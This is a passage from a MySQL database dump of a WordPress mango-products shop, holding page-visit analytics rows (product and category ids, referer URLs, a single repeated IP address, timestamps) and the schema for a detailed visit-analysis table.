0,0,136,1,1,'2025-03-29'),(3511,1,0,0,0,1,2,'2025-03-30'),(3513,0,0,1,1786,1,1,'2025-03-30'),(3514,0,0,1,1755,1,1,'2025-03-30'),(3515,0,1,0,0,21,1,'2025-03-30'),(3516,9,0,0,85,1,1,'2025-03-30'),(3517,9,0,0,136,1,1,'2025-03-30'),(3518,9,0,0,135,1,1,'2025-03-30'),(3519,0,0,1,1775,1,1,'2025-03-30'),(3520,1,0,0,0,1,1,'2025-03-31'),(3521,0,0,1,1775,1,2,'2025-04-01'),(3522,0,0,1,1755,1,2,'2025-04-01'),(3523,0,0,1,1786,1,1,'2025-04-01'),(3524,9,0,0,135,1,2,'2025-04-01'),(3528,9,0,0,136,1,4,'2025-04-01'),(3529,9,0,0,85,1,1,'2025-04-01'),(3532,1,0,0,0,1,3,'2025-04-01'),(3536,9,0,0,135,1,1,'2025-04-02'),(3537,9,0,0,85,1,1,'2025-04-02'),(3538,0,0,1,1786,1,1,'2025-04-02'),(3539,0,0,1,1755,1,1,'2025-04-02'),(3540,1,0,0,0,1,4,'2025-04-03'),(3542,9,0,0,135,1,1,'2025-04-03'),(3545,0,0,1,1786,1,2,'2025-04-04'),(3546,0,0,1,1755,1,3,'2025-04-04'),(3547,9,0,0,135,1,2,'2025-04-04'),(3548,0,0,1,1775,1,3,'2025-04-04'),(3549,9,0,0,136,1,3,'2025-04-04'),(3550,1,0,0,0,1,4,'2025-04-04'),(3562,1,0,0,0,1,3,'2025-04-06'),(3563,0,0,1,1755,1,2,'2025-04-06'),(3564,9,0,0,136,1,1,'2025-04-06'),(3565,0,0,1,1786,1,1,'2025-04-06'),(3568,0,0,1,1775,1,1,'2025-04-06'),(3570,9,0,0,135,1,1,'2025-04-07'),(3571,9,0,0,85,1,1,'2025-04-07'),(3572,0,0,1,1755,1,1,'2025-04-07'),(3573,1,0,0,0,1,1,'2025-04-07'),(3574,9,0,0,136,1,1,'2025-04-07'),(3575,1,0,0,0,1,2,'2025-04-08'),(3577,0,0,1,1755,1,1,'2025-04-08'),(3578,9,0,0,85,1,1,'2025-04-08'),(3579,1,0,0,0,1,2,'2025-04-09'),(3580,0,0,1,1755,1,1,'2025-04-09'),(3582,0,0,1,1775,1,1,'2025-04-10'),(3583,9,0,0,85,1,2,'2025-04-11'),(3585,0,0,1,1786,1,1,'2025-04-11'),(3586,1,0,0,0,1,1,'2025-04-11'),(3587,9,0,0,136,1,1,'2025-04-11'),(3588,9,0,0,135,1,1,'2025-04-12'),(3589,1,0,0,0,1,1,'2025-04-12'),(3590,0,0,1,1755,1,1,'2025-04-12'),(3591,1,0,0,0,1,3,'2025-04-13'),(3593,0,0,1,1786,1,1,'2025-04-13'),(3595,1,0,0,0,1,1,'2025-04-14'),(3596,9,0,0,135,1,1,'2025-04-15'),(3597,1,0,0,0,1,2,'2025-04-16'),(3598,0,0,1,1755,1,1,'2025-04-16'),(3599,9,0,0,136,1,1,'2025-04-16'),(3600,0,0,1,1786,1,2,'2025-04-16'),(3603,9,0,0,135,1,3,'2025-04-17'),(3604,1,0,0,0,1,6,'2025-04-17'),(3605,0,0,1,1755,1,2,'2025-04-17'),(3606,0,0,1,1775,1,3,'2025-04-17'),(3607,0,0,1,1786,1,2,'2025-04-17'),(3615,9,0,0,136,1,5,'2025-04-17'),(3616,9,0,0,85,1,1,'2025-04-17'),(3625,1,0,0,0,1,1,'2025-04-18'),(3626,0,0,1,1786,1,1,'2025-04-18'),(3627,9,0,0,136,1,1,'2025-04-18'),(3628,0,0,1,1755,1,4,'2025-04-19'),(3629,1,0,0,0,1,4,'2025-04-19'),(3630,0,0,1,1786,1,2,'2025-04-19'),(3633,9,0,0,85,1,1,'2025-04-19'),(3636,9,0,0,135,1,2,'2025-04-19'),(3638,0,0,1,1775,1,1,'2025-04-19'),(3640,9,0,0,136,1,3,'2025-04-19'),(3645,1,0,0,0,1,3,'2025-04-21'),(3646,9,0,0,136,1,2,'2025-04-21'),(3647,0,0,1,1755,1,1,'2025-04-21'),(3650,0,0,1,1786,1,1,'2025-04-21'),(3651,9,0,0,135,1,1,'2025-04-21'),(3653,1,0,0,0,1,1,'2025-04-22'),(3654,9,0,0,135,1,2,'2025-04-22'),(3655,9,0,0,85,1,1,'2025-04-22'),(3657,0,0,1,1775,1,2,'2025-04-22'),(3659,0,0,1,1786,1,1,'2025-04-22'),(3660,1,0,0,0,1,2,'2025-04-23'),(3661,0,0,1,1786,1,1,'2025-04-23'),(3663,9,0,0,136,1,2,'2025-04-25'),(3664,0,0,1,1755,1,2,'2025-04-25'),(3665,9,0,0,85,1,1,'2025-04-25'),(3666,9,0,0,135,1,1,'2025-04-25'),(3667,0,0,1,1775,1,1,'2025-04-25'),(3668,0,0,1,1786,1,1,'2025-04-25'),(3669,1,0,0,0,1,2,'2025-04-25'),(3670,0,1,0,0,21,1,'2025-04-25'),(3674,0,0,1,1775,1,3,'2025-04-26'),(3676,1,0,0,0,1,1,'2025-04-26'),(3677,9,0,0,136,1,1,'2025-04-26'),(3678,9,0,0,135,1,1,'2025-04-26'),(3679,9,0,0,85,1,1,'2025-04-26'),(3680,0,0,1,1786,1,1,'2025-04-26'),(3682,0,0,1,1755,1,1,'2025-04-26'),(3683,1,0,0,0,1,3,'2025-04-27'),(3684,9,0,0,135,1,1,'2025-04-27'),(3685,0,0,1,1786,1,1,'2025-04-27'),(3686,9,0,0,85,1,1,'2025-04-27'),(3689,1,0,0,0,1,2,'2025-04-28'),(3691,9,0,0,136,1,2,'2025-04-28'),(3693,0,0,1,1755,1,2,'2025-04-29'),(3694,0,0,1,1775,1,2,'2025-04-29'),(3695,9,0,0,135,1,1,'2025-04-29'),(3696,1,0,0,0,1,2,'2025-04-29'),(3697,0,0,1,1786,1,1,'2025-04-29'),(3701,1,0,0,0,1,1,'2025-04-30'),(3702,0,0,1,1755,1,2,'2025-05-01'),(3703,1,0,0,0,1,1,'2025-05-01'),(3705,9,0,0,136,1,1,'2025-05-02'),(3706,9,0,0,135,1,1,'2025-05-02'),(3707,0,0,1,1786,1,2,'2025-05-02'),(3708,1,0,0,0,1,1,'2025-05-02'),(3710,9,0,0,85,1,1,'2025-05-02'),(3711,1,0,0,0,1,1,'2025-05-03'),(3712,0,0,1,1755,1,1,'2025-05-04'),(3713,9,0,0,135,1,1,'2025-05-04'),(3714,1,0,0,0,1,1,'2025-05-04'),(3715,0,0,1,1786,1,1,'2025-05-04'),(3716,1,0,0,0,1,2,'2025-05-06'),(3718,0,0,1,1755,1,1,'2025-05-06'),(3719,0,0,1,1775,1,1,'2025-05-06'),(3720,9,0,0,135,1,1,'2025-05-07'),(3721,0,0,1,1755,1,1,'2025-05-07'),(3722,0,0,1,1775,1,1,'2025-05-07'),(3723,9,0,0,136,1,2,'2025-05-07'),(3724,9,0,0,85,1,1,'2025-05-07'),(3726,1,0,0,0,1,1,'2025-05-07'),(3727,0,0,1,1755,1,1,'2025-05-08'),(3728,1,0,0,0,1,1,'2025-05-09'),(3729,0,1,0,0,21,1,'2025-05-10'),(3730,9,0,0,85,1,1,'2025-05-10'),(3731,0,0,1,1755,1,1,'2025-05-10'),(3732,1,0,0,0,1,2,'2025-05-11'),(3733,0,0,1,1775,1,1,'2025-05-11'),(3735,9,0,0,136,1,2,'2025-05-12'),(3736,9,0,0,135,1,1,'2025-05-12'),(3738,0,0,1,1755,1,1,'2025-05-13'),(3739,0,0,1,1755,1,1,'2025-05-14'),(3740,1,0,0,0,1,1,'2025-05-14'),(3741,0,1,0,0,21,1,'2025-05-15'),(3742,1,0,0,0,1,1,'2025-05-16'),(3743,0,0,1,1786,1,1,'2025-05-16'),(3744,9,0,0,136,1,1,'2025-05-16');
/*!40000 ALTER TABLE `wp_wcfm_daily_analysis` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wcfm_detailed_analysis`
--

DROP TABLE IF EXISTS `wp_wcfm_detailed_analysis`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_wcfm_detailed_analysis` (
  `ID` bigint(20) NOT NULL AUTO_INCREMENT,
  `is_shop` tinyint(1) NOT NULL DEFAULT 0,
  `is_store` tinyint(1) NOT NULL DEFAULT 0,
  `is_product` tinyint(1) NOT NULL DEFAULT 0,
  `product_id` bigint(20) NOT NULL DEFAULT 0,
  `author_id` bigint(20) NOT NULL DEFAULT 0,
  `referer` text NOT NULL,
  `ip_address` varchar(60) NOT NULL,
  `country` varchar(30) NOT NULL,
  `state` varchar(30) NOT NULL,
  `city` varchar(100) NOT NULL,
  `visited` timestamp NOT NULL DEFAULT current_timestamp(),
  PRIMARY KEY (`ID`)
) ENGINE=InnoDB AUTO_INCREMENT=3745 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wcfm_detailed_analysis`
--

LOCK TABLES `wp_wcfm_detailed_analysis` WRITE;
/*!40000 ALTER TABLE `wp_wcfm_detailed_analysis` DISABLE KEYS */;
INSERT INTO `wp_wcfm_detailed_analysis` VALUES (1,9,0,0,43,1,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.in','3.110.242.160','','','','2022-01-28 10:39:01'),(2,1,0,0,0,2,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-28 10:39:27'),(3,1,0,0,0,2,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inshop','3.110.242.160','','','','2022-01-28 10:39:54'),(4,1,0,0,0,2,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inshop','3.110.242.160','','','','2022-01-28 10:40:34'),(5,1,0,0,0,2,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inshop','3.110.242.160','','','','2022-01-28 10:40:50'),(6,1,0,0,0,2,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inshop','3.110.242.160','','','','2022-01-28 10:40:56'),(7,1,0,0,0,2,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inshop','3.110.242.160','','','','2022-01-28 10:47:22'),(8,9,0,0,43,1,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-28 11:43:57'),(9,9,0,0,44,1,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-28 11:55:21'),(10,9,0,0,44,1,'https://www.mangomitra.in/wp-admin/term.php?taxonomy=pwb-brand&tag_ID=44&post_type=product','3.110.242.160','','','','2022-01-28 11:56:43'),(11,9,0,0,44,1,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inbrandbeta','3.110.242.160','','','','2022-01-28 11:57:04'),(12,9,0,0,44,1,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inbrandbeta','3.110.242.160','','','','2022-01-28 11:59:26'),(13,9,0,0,44,1,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.inbrandbeta','3.110.242.160','','','','2022-01-28 12:09:00'),(14,9,0,0,43,1,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 04:15:16'),(15,9,0,0,45,1,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 04:51:46'),(16,1,0,0,0,2,'https://www.mangomitra.in/brand/alpha/','3.110.242.160','','','','2022-01-31 04:53:40'),(17,9,0,0,36,1,'https://www.mangomitra.in/wp-admin/customize.php?url=httpswww.mangomitra.in','3.110.242.160','','','','2022-01-31 05:30:26'),(18,9,0,0,43,1,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 06:26:52'),(19,9,0,0,45,1,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 06:27:16'),(20,1,0,0,0,2,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 06:40:07'),(21,0,0,1,596,2,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 07:38:11'),(22,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-01-31 08:57:39'),(23,0,0,1,590,2,'https://mangomitra.in/','3.110.242.160','','','','2022-01-31 08:59:00'),(24,1,0,0,0,2,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 09:08:41'),(25,1,0,0,0,2,'https://www.mangomitra.in/','3.110.242.160','','','','2022-01-31 09:19:21'),(26,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-01-31 10:33:18'),(27,9,0,0,43,1,'https://mangomitra.in/','3.110.242.160','','','','2022-01-31 10:57:29'),(28,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-01-31 11:17:43'),(29,9,0,0,35,1,'https://mangomitra.in/brand/alpha/','3.110.242.160','','','','2022-01-31 11:49:47'),(30,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-01-31 11:59:40'),(31,1,0,0,0,2,'https://mangomitra.in/wp-admin/post.php?post=8&action=elementor','3.110.242.160','','','','2022-02-01 04:21:34'),(32,1,0,0,0,2,'https://mangomitra.in/wp-admin/customize.php?url=httpsmangomitra.in','3.110.242.160','','','','2022-02-01 09:11:52'),(33,9,0,0,35,1,'','3.110.242.160','','','','2022-02-01 14:53:27'),(34,9,0,0,38,1,'','3.110.242.160','','','','2022-02-01 14:54:03'),(35,9,0,0,36,1,'','3.110.242.160','','','','2022-02-01 14:54:05'),(36,9,0,0,77,1,'','3.110.242.160','','','','2022-02-01 14:54:08'),(37,9,0,0,76,1,'','3.110.242.160','','','','2022-02-01 14:56:06'),(38,9,0,0,78,1,'','3.110.242.160','','','','2022-02-01 14:57:40'),(39,1,0,0,0,2,'','3.110.242.160','','','','2022-02-01 15:01:57'),(40,9,0,0,37,1,'','3.110.242.160','','','','2022-02-01 15:02:53'),(41,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 04:12:32'),(42,1,0,0,0,2,'','3.110.242.160','','','','2022-02-02 06:55:50'),(43,9,0,0,78,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 07:36:03'),(44,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 07:55:06'),(45,9,0,0,36,1,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-02-02 07:55:27'),(46,9,0,0,37,1,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-02-02 07:55:33'),(47,9,0,0,76,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-02-02 07:55:38'),(48,9,0,0,38,1,'https://mangomitra.in/product-category/mango-concentrate/','3.110.242.160','','','','2022-02-02 07:55:42'),(49,9,0,0,77,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-02-02 07:55:46'),(50,9,0,0,78,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-02-02 07:55:50'),(51,9,0,0,79,1,'https://mangomitra.in/product-category/mango-puree/','3.110.242.160','','','','2022-02-02 07:55:54'),(52,9,0,0,80,1,'https://mangomitra.in/product-category/mango-squash/','3.110.242.160','','','','2022-02-02 07:55:57'),(53,1,0,0,0,2,'https://mangomitra.in/my-account/','3.110.242.160','','','','2022-02-02 08:54:26'),(54,9,0,0,76,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 08:57:32'),(55,0,0,1,541,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 10:12:03'),(56,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 10:17:41'),(57,1,0,0,0,2,'','3.110.242.160','','','','2022-02-02 11:42:54'),(58,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 12:07:01'),(59,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 12:20:13'),(60,0,0,1,541,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-02 12:51:48'),(61,1,0,0,0,2,'https://mangomitra.in/wp-admin/customize.php?url=httpsmangomitra.in','3.110.242.160','','','','2022-02-03 04:59:45'),(62,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-03 12:06:52'),(63,0,0,1,596,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-03 12:07:03'),(64,9,0,0,38,1,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-03 12:35:46'),(65,0,0,1,637,5,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-02-03 12:35:54'),(66,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 04:20:08'),(67,0,0,1,596,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-04 04:20:14'),(68,0,0,1,637,5,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-04 04:24:30'),(69,0,0,1,612,3,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 04:27:37'),(70,1,0,0,0,2,'https://mangomitra.in/wp-admin/customize.php?url=httpsmangomitra.in','3.110.242.160','','','','2022-02-04 10:06:38'),(71,0,0,1,538,2,'','3.110.242.160','','','','2022-02-04 10:36:15'),(72,0,0,1,536,3,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 10:36:18'),(73,0,0,1,596,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 11:18:51'),(74,1,0,0,0,2,'https://mangomitra.in/product/aaaa/','3.110.242.160','','','','2022-02-04 11:19:09'),(75,0,0,1,596,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 11:30:08'),(76,0,0,1,596,2,'','3.110.242.160','','','','2022-02-04 11:41:26'),(77,0,0,1,637,5,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 11:49:46'),(78,0,0,1,540,4,'https://mangomitra.in/wp-admin/post.php?post=540&action=edit','3.110.242.160','','','','2022-02-04 11:58:10'),(79,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 12:16:56'),(80,9,0,0,38,1,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-02-04 12:17:03'),(81,0,0,1,637,5,'https://mangomitra.in/','3.110.242.160','','','','2022-02-04 14:00:12'),(82,0,0,1,535,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-05 00:09:27'),(83,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-05 03:46:29'),(84,9,0,0,36,1,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-02-05 03:46:33'),(85,9,0,0,37,1,'https://mangomitra.in/product-category/pickles/','3.110.242.160','','','','2022-02-05 03:46:36'),(86,9,0,0,76,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-02-05 03:46:39'),(87,9,0,0,38,1,'https://mangomitra.in/product-category/mango-concentrate/','3.110.242.160','','','','2022-02-05 03:46:43'),(88,9,0,0,77,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-02-05 03:46:46'),(89,9,0,0,78,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-02-05 03:46:50'),(90,9,0,0,79,1,'https://mangomitra.in/product-category/mango-puree/','3.110.242.160','','','','2022-02-05 03:46:53'),(91,9,0,0,80,1,'https://mangomitra.in/product-category/mango-squash/','3.110.242.160','','','','2022-02-05 03:46:56'),(92,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-07 04:26:43'),(93,0,0,1,596,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-07 04:37:58'),(94,9,0,0,83,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-07 05:23:43'),(95,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-07 05:47:48'),(96,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-07 05:51:52'),(97,0,1,0,0,5,'https://mangomitra.in/wp-admin/users.php','3.110.242.160','','','','2022-02-07 06:47:00'),(98,9,0,0,85,1,'https://mangomitra.in/mango-recipes/','3.110.242.160','','','','2022-02-07 08:10:35'),(99,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-07 12:39:21'),(100,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-07 12:40:00'),(101,9,0,0,37,1,'https://mangomitra.in/product-category/mangoes/','3.110.242.160','','','','2022-02-07 12:40:12'),(102,9,0,0,76,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-02-07 12:40:18'),(103,9,0,0,38,1,'https://mangomitra.in/product-category/mango-concentrate/','3.110.242.160','','','','2022-02-07 12:40:25'),(104,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-08 04:40:23'),(105,0,0,1,596,2,'https://mangomitra.in/cart/','3.110.242.160','','','','2022-02-08 04:46:18'),(106,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-08 10:00:44'),(107,0,0,1,596,2,'https://mangomitra.in/product-tag/pre-order/','3.110.242.160','','','','2022-02-08 10:01:07'),(108,1,0,0,0,2,'https://mangomitra.in/product/aaaa/','3.110.242.160','','','','2022-02-08 10:01:59'),(109,0,0,1,612,3,'https://mangomitra.in/product/aaaa/','3.110.242.160','','','','2022-02-08 10:09:20'),(110,0,0,1,637,5,'https://mangomitra.in/','3.110.242.160','','','','2022-02-08 10:30:59'),(111,9,0,0,79,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-09 07:39:14'),(112,9,0,0,80,1,'https://mangomitra.in/product-category/mango-squash/','3.110.242.160','','','','2022-02-09 07:39:29'),(113,9,0,0,77,1,'https://mangomitra.in/product-category/dried-mango/','3.110.242.160','','','','2022-02-09 07:39:52'),(114,9,0,0,38,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-02-09 07:40:01'),(115,9,0,0,76,1,'https://mangomitra.in/product-category/jams-and-squashes/','3.110.242.160','','','','2022-02-09 07:40:12'),(116,9,0,0,37,1,'https://mangomitra.in/product-category/mango-concentrate/','3.110.242.160','','','','2022-02-09 07:40:29'),(117,9,0,0,76,1,'https://mangomitra.in/product-category/pickle-mangoes/','3.110.242.160','','','','2022-02-09 09:15:54'),(118,9,0,0,80,1,'https://mangomitra.in/product-category/mango-concentrate/','3.110.242.160','','','','2022-02-09 09:16:03'),(119,9,0,0,77,1,'https://mangomitra.in/product-category/dried-mango/','3.110.242.160','','','','2022-02-09 09:16:25'),(120,9,0,0,78,1,'https://mangomitra.in/product-category/mango-juices/','3.110.242.160','','','','2022-02-09 09:16:34'),(121,9,0,0,80,1,'https://mangomitra.in/product-category/mango-puree/','3.110.242.160','','','','2022-02-09 11:09:51'),(122,9,0,0,80,1,'https://mangomitra.in/product-category/dried-mango/','3.110.242.160','','','','2022-02-09 12:33:44'),(123,1,0,0,0,2,'','3.110.242.160','','','','2022-02-09 13:55:02'),(124,9,0,0,79,1,'','3.110.242.160','','','','2022-02-10 10:16:19'),(125,9,0,0,80,1,'','3.110.242.160','','','','2022-02-10 10:16:20'),(126,0,0,1,543,4,'','3.110.242.160','','','','2022-02-10 10:16:24'),(127,0,0,1,542,3,'','3.110.242.160','','','','2022-02-10 10:16:26'),(128,0,0,1,596,2,'','3.110.242.160','','','','2022-02-10 10:16:27'),(129,1,0,0,0,5,'https://mangomitra.in/','3.110.242.160','','','','2022-02-10 12:08:47'),(130,1,0,0,0,2,'https://mangomitra.in/?wapppress=1','3.110.242.160','','','','2022-02-11 05:07:36'),(131,9,0,0,76,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-11 05:40:18'),(132,9,0,0,80,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-11 06:10:59'),(133,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-11 07:27:10'),(134,9,0,0,77,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-11 07:34:45'),(135,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-12 11:38:35'),(136,9,0,0,35,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-12 11:38:46'),(137,9,0,0,36,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-12 11:38:47'),(138,9,0,0,37,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-12 11:38:48'),(139,9,0,0,76,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-12 11:38:52'),(140,9,0,0,38,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-12 11:38:55'),(141,9,0,0,76,1,'','3.110.242.160','','','','2022-02-12 15:58:01'),(142,1,0,0,0,2,'','3.110.242.160','','','','2022-02-12 15:58:09'),(143,0,0,1,531,4,'','3.110.242.160','','','','2022-02-12 15:58:27'),(144,0,0,1,529,2,'','3.110.242.160','','','','2022-02-12 15:59:05'),(145,9,0,0,35,1,'','3.110.242.160','','','','2022-02-12 15:59:29'),(146,0,0,1,637,5,'','3.110.242.160','','','','2022-02-12 15:59:32'),(147,9,0,0,38,1,'','3.110.242.160','','','','2022-02-12 16:00:04'),(148,9,0,0,80,1,'','3.110.242.160','','','','2022-02-12 16:00:12'),(149,9,0,0,79,1,'','3.110.242.160','','','','2022-02-12 16:00:33'),(150,0,0,1,543,4,'','3.110.242.160','','','','2022-02-12 16:00:40'),(151,0,0,1,534,4,'','3.110.242.160','','','','2022-02-12 16:00:54'),(152,0,0,1,535,2,'','3.110.242.160','','','','2022-02-12 16:00:57'),(153,0,0,1,590,2,'','3.110.242.160','','','','2022-02-12 16:02:23'),(154,0,0,1,612,3,'','3.110.242.160','','','','2022-02-12 16:02:25'),(155,9,0,0,77,1,'','3.110.242.160','','','','2022-02-12 16:02:27'),(156,0,0,1,539,3,'','3.110.242.160','','','','2022-02-12 16:02:29'),(157,9,0,0,44,1,'','3.110.242.160','','','','2022-02-12 16:02:35'),(158,0,0,1,536,3,'','3.110.242.160','','','','2022-02-12 16:02:38'),(159,9,0,0,45,1,'','3.110.242.160','','','','2022-02-12 16:02:40'),(160,0,0,1,532,2,'','3.110.242.160','','','','2022-02-12 16:02:51'),(161,0,0,1,533,3,'','3.110.242.160','','','','2022-02-12 16:03:04'),(162,9,0,0,78,1,'','3.110.242.160','','','','2022-02-12 16:03:11'),(163,0,0,1,540,4,'','3.110.242.160','','','','2022-02-12 16:03:22'),(164,9,0,0,85,1,'','3.110.242.160','','','','2022-02-12 16:03:45'),(165,0,0,1,537,4,'','3.110.242.160','','','','2022-02-12 16:04:36'),(166,0,0,1,542,3,'','3.110.242.160','','','','2022-02-12 16:05:29'),(167,0,0,1,538,2,'','3.110.242.160','','','','2022-02-12 16:05:34'),(168,9,0,0,37,1,'','3.110.242.160','','','','2022-02-12 16:05:40'),(169,9,0,0,36,1,'','3.110.242.160','','','','2022-02-12 16:06:23'),(170,0,0,1,596,2,'','3.110.242.160','','','','2022-02-12 16:07:37'),(171,0,0,1,541,2,'','3.110.242.160','','','','2022-02-12 16:08:05'),(172,0,0,1,530,1,'','3.110.242.160','','','','2022-02-12 16:08:12'),(173,9,0,0,43,1,'','3.110.242.160','','','','2022-02-12 16:08:35'),(174,9,0,0,77,1,'','3.110.242.160','','','','2022-02-12 21:10:06'),(175,9,0,0,76,1,'','3.110.242.160','','','','2022-02-12 21:10:09'),(176,1,0,0,0,2,'https://mangomitra.in/','3.110.242.160','','','','2022-02-13 08:35:18'),(177,0,0,1,637,5,'https://mangomitra.in/','3.110.242.160','','','','2022-02-13 08:35:38'),(178,9,0,0,80,1,'','3.110.242.160','','','','2022-02-13 13:54:23'),(179,9,0,0,38,1,'','3.110.242.160','','','','2022-02-13 14:12:15'),(180,9,0,0,76,1,'','3.110.242.160','','','','2022-02-13 14:29:18'),(181,9,0,0,77,1,'','3.110.242.160','','','','2022-02-13 14:45:42'),(182,9,0,0,35,1,'','3.110.242.160','','','','2022-02-13 15:02:26'),(183,9,0,0,36,1,'','3.110.242.160','','','','2022-02-13 15:13:12'),(184,0,0,1,536,3,'','3.110.242.160','','','','2022-02-13 15:46:59'),(185,0,0,1,535,2,'','3.110.242.160','','','','2022-02-13 15:59:01'),(186,9,0,0,78,1,'','3.110.242.160','','','','2022-02-13 16:09:57'),(187,0,0,1,590,2,'','3.110.242.160','','','','2022-02-13 16:44:34'),(188,0,0,1,637,5,'','3.110.242.160','','','','2022-02-13 16:52:40'),(189,0,0,1,541,2,'','3.110.242.160','','','','2022-02-13 17:00:51'),(190,0,0,1,532,2,'','3.110.242.160','','','','2022-02-13 17:08:38'),(191,0,0,1,543,4,'','3.110.242.160','','','','2022-02-13 18:10:21'),(192,1,0,0,0,2,'','3.110.242.160','','','','2022-02-13 20:13:36'),(193,0,0,1,542,3,'','3.110.242.160','','','','2022-02-13 21:13:39'),(194,0,0,1,530,1,'','3.110.242.160','','','','2022-02-13 22:12:43'),(195,9,0,0,45,1,'','3.110.242.160','','','','2022-02-14 00:17:28'),(196,9,0,0,43,1,'','3.110.242.160','','','','2022-02-14 01:22:28'),(197,9,0,0,85,1,'https://mangomitra.in/','3.110.242.160','','','','2022-02-14 05:09:53'),(198,0,0,1,537,4,'','3.110.242.160','','','','2022-02-14 06:15:57'),(199,1,0,0,0,2,'https://mangomitra.in/?add-to-cart=542','3.110.242.160','','','','2022-02-14 06:21:23'),(200,0,0,1,596,2,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-14 06:29:31'),(201,0,0,1,637,5,'https://mangomitra.in/product/aaaa/','3.110.242.160','','','','2022-02-14 06:33:38'),(202,0,0,1,543,4,'https://mangomitra.in/shop/','3.110.242.160','','','','2022-02-14 06:51:48'),(203,0,0,1,542,3,'https://mangomitra.in/cart/','3.110.242.160','','','','2022-02-14 